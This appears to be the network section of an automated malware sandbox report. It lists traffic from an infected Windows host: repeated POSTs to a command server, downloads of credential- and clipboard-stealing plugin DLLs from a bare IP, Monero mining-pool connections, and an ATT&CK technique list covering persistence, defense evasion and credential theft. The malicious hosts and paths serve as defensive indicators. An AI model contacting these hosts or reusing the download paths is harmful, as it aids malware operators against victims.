POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

17.2kB
1.8kB
17
16

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.8kB
94.8kB
74
73

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2Ib221qx.exe

260 B
5
194.169.175.127:80

http://host-host-file8.com/

http

Explorer.EXE

824 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

19.6kB
1.6kB
19
12

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

18.6kB
1.5kB
18
10

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

405.6kB
7.8kB
288
166

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

260 B
5
77.91.124.55:19071

260 B
5
77.91.124.55:19071

260 B
5
162.159.134.233:443

cdn.discordapp.com

tls

1.0kB
4.6kB
10
12
185.82.216.49:443

server3.cdntokiog.studio

tls

1.8kB
7.5kB
13
15
188.114.96.0:443

walkinglate.com

tls

63.9kB
2.2MB
1208
1624
135.125.238.108:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.8kB
10
9
172.67.34.170:443

pastebin.com

tls

1.0kB
6.0kB
11
12
51.15.58.224:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.3kB
8
7

8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
142.250.179.141:443

accounts.google.com

https

msedge.exe

12.0kB
247.5kB
116
251
8.8.8.8:53

35.247.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.247.240.157.in-addr.arpa
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.30.27
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.30.35
8.8.8.8:53

27.30.240.157.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

27.30.240.157.in-addr.arpa
8.8.8.8:53

35.30.240.157.in-addr.arpa

dns

72 B
125 B
1
1

DNS Request

35.30.240.157.in-addr.arpa
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.30.35
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.30.35
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
224.0.0.251:5353

517 B
8
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
142.251.36.14:443

play.google.com

https

msedge.exe

9.3kB
10.4kB
22
23
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
8.8.8.8:53

77.121.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

77.121.18.2.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53
8.8.8.8:53

142.9.123.176.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

142.9.123.176.in-addr.arpa
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

learn.microsoft.com

dns

msedge.exe

65 B
270 B
1
1

DNS Request

learn.microsoft.com

DNS Response

104.85.2.139
8.8.8.8:53

114.110.16.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

114.110.16.96.in-addr.arpa
8.8.8.8:53

wcpstatic.microsoft.com

dns

msedge.exe

69 B
256 B
1
1

DNS Request

wcpstatic.microsoft.com

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

js.monitor.azure.com

dns

msedge.exe

66 B
273 B
1
1

DNS Request

js.monitor.azure.com

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

139.2.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

139.2.85.104.in-addr.arpa
8.8.8.8:53

mscom.demdex.net

dns

msedge.exe

62 B
300 B
1
1

DNS Request

mscom.demdex.net

DNS Response

34.255.45.168

52.18.44.230

34.251.64.143

99.80.170.99

54.229.208.26

54.229.131.209

34.254.109.178

99.81.14.86
8.8.8.8:53

microsoftmscompoc.tt.omtrdc.net

dns

msedge.exe

154 B
424 B
2
2

DNS Request

microsoftmscompoc.tt.omtrdc.net

DNS Response

66.235.152.107

66.235.152.143

66.235.152.113

66.235.152.152

66.235.152.115

66.235.152.126

DNS Request

microsoftmscompoc.tt.omtrdc.net

DNS Response

66.235.152.115

66.235.152.126

66.235.152.107

66.235.152.143

66.235.152.113

66.235.152.152
8.8.8.8:53

target.microsoft.com

dns

msedge.exe

66 B
246 B
1
1

DNS Request

target.microsoft.com

DNS Response

66.235.152.143

66.235.152.113

66.235.152.152

66.235.152.115

66.235.152.126

66.235.152.107
8.8.8.8:53

67.246.107.13.in-addr.arpa

dns

144 B
316 B
2
2

DNS Request

67.246.107.13.in-addr.arpa

DNS Request

67.246.107.13.in-addr.arpa
8.8.8.8:53

168.45.255.34.in-addr.arpa

dns

144 B
270 B
2
2

DNS Request

168.45.255.34.in-addr.arpa

DNS Request

168.45.255.34.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

C279.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.13.31

172.67.75.172

104.26.12.31
8.8.8.8:53

31.13.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.13.26.104.in-addr.arpa
8.8.8.8:53

browser.events.data.microsoft.com

dns

msedge.exe

79 B
203 B
1
1

DNS Request

browser.events.data.microsoft.com

DNS Response

13.89.179.8
8.8.8.8:53

8.179.89.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

8.179.89.13.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

162.61.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

162.61.21.104.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

84cededc-1d1c-4ccc-9294-7ca1a8edacb8.uuid.cdntokiog.studio

dns

104 B
163 B
1
1

DNS Request

84cededc-1d1c-4ccc-9294-7ca1a8edacb8.uuid.cdntokiog.studio
8.8.8.8:53

server3.cdntokiog.studio

dns

70 B
86 B
1
1

DNS Request

server3.cdntokiog.studio

DNS Response

185.82.216.49
8.8.8.8:53

stun3.l.google.com

dns

64 B
80 B
1
1

DNS Request

stun3.l.google.com

DNS Response

74.125.204.127
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.134.233

162.159.130.233

162.159.135.233

162.159.133.233

162.159.129.233
74.125.204.127:19302

stun3.l.google.com

48 B
60 B
1
1
8.8.8.8:53

walkinglate.com

dns

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.96.0

188.114.97.0
8.8.8.8:53

127.204.125.74.in-addr.arpa

dns

73 B
107 B
1
1

DNS Request

127.204.125.74.in-addr.arpa
8.8.8.8:53

233.134.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.134.159.162.in-addr.arpa
8.8.8.8:53

49.216.82.185.in-addr.arpa

dns

72 B
95 B
1
1

DNS Request

49.216.82.185.in-addr.arpa
8.8.8.8:53

0.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.96.114.188.in-addr.arpa
8.8.8.8:53

123.10.44.20.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

123.10.44.20.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

212.47.253.124

51.68.190.80

163.172.154.142

51.15.58.224

51.68.143.81

51.15.193.130

51.15.65.182

135.125.238.108

51.255.34.118
8.8.8.8:53

108.238.125.135.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

108.238.125.135.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.68.143

104.20.67.143
8.8.8.8:53

170.34.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

224.58.15.51.in-addr.arpa

dns

71 B
117 B
1
1

DNS Request

224.58.15.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery